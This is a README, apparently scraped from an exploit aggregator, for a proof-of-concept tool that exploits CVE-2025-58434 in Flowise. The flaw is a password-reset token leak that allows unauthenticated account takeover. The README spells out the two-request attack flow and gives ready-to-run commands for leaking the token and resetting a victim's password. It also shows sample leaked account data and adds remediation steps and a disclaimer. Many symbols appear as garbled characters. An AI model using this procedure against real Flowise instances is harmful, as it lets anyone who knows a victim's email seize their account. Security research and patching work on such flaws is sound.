Share
## https://sploitus.com/exploit?id=85EF54BC-A345-51E2-8911-097DB2730411
# CVE-2025-58434 โ Flowise Account Takeover via Token Disclosure
> โ ๏ธ **This repository is for educational and authorized security research only.**
> Unauthorized use against systems you do not own or have explicit permission to test is **illegal**.
---
## Table of Contents
- [Overview](#overview)
- [Vulnerability Details](#vulnerability-details)
- [Attack Flow](#attack-flow)
- [Affected Versions](#affected-versions)
- [Repository Structure](#repository-structure)
- [Requirements](#requirements)
- [Installation](#installation)
- [Usage](#usage)
- [Example Output](#example-output)
- [Remediation](#remediation)
- [Disclosure Timeline](#disclosure-timeline)
- [References](#references)
- [Disclaimer](#disclaimer)
---
## Overview
The `forgot-password` endpoint in **Flowise** (both cloud-hosted and self-hosted) returns a valid password reset token (`tempToken`) directly in the HTTP response body โ **without any email verification or authentication**.
This means an attacker who knows (or can guess) a victim's email address can:
1. Call the `forgot-password` endpoint โ receive the `tempToken` in the JSON response
2. Use the `tempToken` to call `reset-password` โ set an arbitrary new password
3. Log in as the victim โ **full account takeover (ATO)**
No prior access, no user interaction, and no email access is required.
---
## Vulnerability Details
| Field | Value |
|--------------------|------------------------------------------------------------|
| **CVE ID** | CVE-2025-58434 |
| **CVSS Score** | 9.8 (Critical) |
| **CVSS Vector** | `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` |
| **CWE** | CWE-640: Weak Password Recovery Mechanism |
| **Type** | Authentication Bypass / Insecure Direct Object Exposure |
| **Affected App** | Flowise (cloud + self-hosted) |
| **Endpoint 1** | `POST /api/v1/account/forgot-password` |
| **Endpoint 2** | `POST /api/v1/account/reset-password` |
### Root Cause
The `forgot-password` handler returns the entire user record โ including the generated `tempToken` โ directly in the API response instead of **only** sending it to the user's registered email address.
```json
{
"user": {
"id": "",
"name": "Victim Name",
"email": "victim@example.com",
"credential": "",
"tempToken": "",
"tokenExpiry": "2025-08-19T13:00:33.834Z",
"status": "active"
}
}
```
---
## Attack Flow
```
Attacker Flowise API
โ โ
โ POST /forgot-password {email} โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโบโ
โ โ (generates tempToken)
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ 201 { tempToken: "abc123..." } โ
โ โ
โ POST /reset-password {email, โ
โ tempToken, newPassword} โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโบโ
โ โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ 200 OK (password changed!) โ
โ โ
โ Account Takeover Complete
```
---
## Affected Versions
- Flowise Cloud (`cloud.flowiseai.com`) โ confirmed affected
- All self-hosted Flowise deployments prior to the patch
Check the [official Flowise GitHub](https://github.com/FlowiseAI/Flowise) for patched release information.
---
## Repository Structure
```
CVE-2025-58434/
โโโ cve_2025_58434_poc.py # Main PoC script (two-stage ATO)
โโโ requirements.txt # Python dependencies
โโโ README.md # This file
โโโ DISCLAIMER.md # Legal notice (read before use)
```
---
## Requirements
- Python 3.7 or higher
- `requests` library
---
## Installation
```bash
# Clone the repository
git clone https://github.com/yourhandle/CVE-2025-58434
cd CVE-2025-58434
# Install dependencies
pip install -r requirements.txt
```
---
## Usage
### Help Screen
```bash
python3 cve_2025_58434_poc.py --help
```
### Stage 1 โ Leak the Token (Reconnaissance)
Confirm the instance is vulnerable and retrieve the `tempToken` without resetting any password.
```bash
python3 cve_2025_58434_poc.py \
--url https://flowise.example.com \
--email admin@example.com
```
### Stage 2 โ Full Account Takeover
Use the leaked token to reset the password immediately.
```bash
python3 cve_2025_58434_poc.py \
--url https://flowise.example.com \
--email admin@example.com \
--reset \
--new-password "MyNewP@ss2025!"
```
### Dump Raw JSON Response
```bash
python3 cve_2025_58434_poc.py \
--url https://flowise.example.com \
--email admin@example.com \
--json-output
```
### All Options
| Flag | Short | Description | Default |
|-------------------------|-------|--------------------------------------------------------|-----------------|
| `--url URL` | `-u` | Base URL of the Flowise instance | *(required)* |
| `--email EMAIL` | `-e` | Target account email address | *(required)* |
| `--reset` | `-r` | Perform Stage 2: reset password with leaked token | `False` |
| `--new-password PASS` | `-p` | New password to set (used with `--reset`) | `Changeme@2025!`|
| `--timeout SECONDS` | `-t` | HTTP request timeout | `10` |
| `--json-output` | `-j` | Print raw JSON API response to stdout | `False` |
---
## Example Output
```
[Step 1] Sending forgot-password request โฆ
[*] HTTP Status : 201
========================================================================
LEAKED ACCOUNT DATA
========================================================================
User ID : 3fa1c2d4-xxxx-xxxx-xxxx-xxxxxxxxxxxx
Name : Admin User
Email : admin@example.com
Credential : $2b$10$xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Status : active
tempToken : eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
tokenExpiry : 2025-08-19T13:00:33.834Z
========================================================================
[+] tempToken obtained : eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
[!] VULNERABLE: The instance leaks password reset tokens unauthenticated!
```
---
## Remediation
If you are a **Flowise instance operator**, apply the following mitigations immediately:
1. **Never return reset tokens in API responses.** Send the token exclusively via the registered email address.
2. **Return a generic success message** from `forgot-password` regardless of whether the email exists โ this also prevents account enumeration.
3. **Enforce token constraints:**
- Single-use (invalidate after first use)
- Short expiry (e.g., 15 minutes)
- Tied to the requesting IP / User-Agent where possible
4. **Apply the fix to all deployment models** โ cloud and self-hosted.
5. **Add rate limiting** to the `forgot-password` endpoint.
6. **Log and alert** on abnormal password reset activity.
7. **Consider MFA** for administrator and high-privilege accounts.
---
## Disclosure Timeline
| Date | Event |
|------------|--------------------------------------------|
| 2025-08-19 | Vulnerability discovered and reported |
| TBD | Vendor acknowledgement |
| TBD | Patch released |
| TBD | Public disclosure |
---
## References
- [GitHub Advisory GHSA-wgpv-6j63-x5ph](https://github.com/advisories/GHSA-wgpv-6j63-x5ph)
- [NVD โ CVE-2025-58434](https://nvd.nist.gov/vuln/detail/CVE-2025-58434)
- [Flowise GitHub Repository](https://github.com/FlowiseAI/Flowise)
- [CWE-640: Weak Password Recovery Mechanism](https://cwe.mitre.org/data/definitions/640.html)
---
## Disclaimer
This project is intended solely for **educational purposes** and **authorized penetration testing**.
- Do **NOT** run this tool against any system without **explicit written permission** from the system owner.
- The author(s) of this repository accept **no responsibility** for any misuse, damage, or legal consequences arising from unauthorized use.
- See [DISCLAIMER.md](./DISCLAIMER.md) for the full legal notice.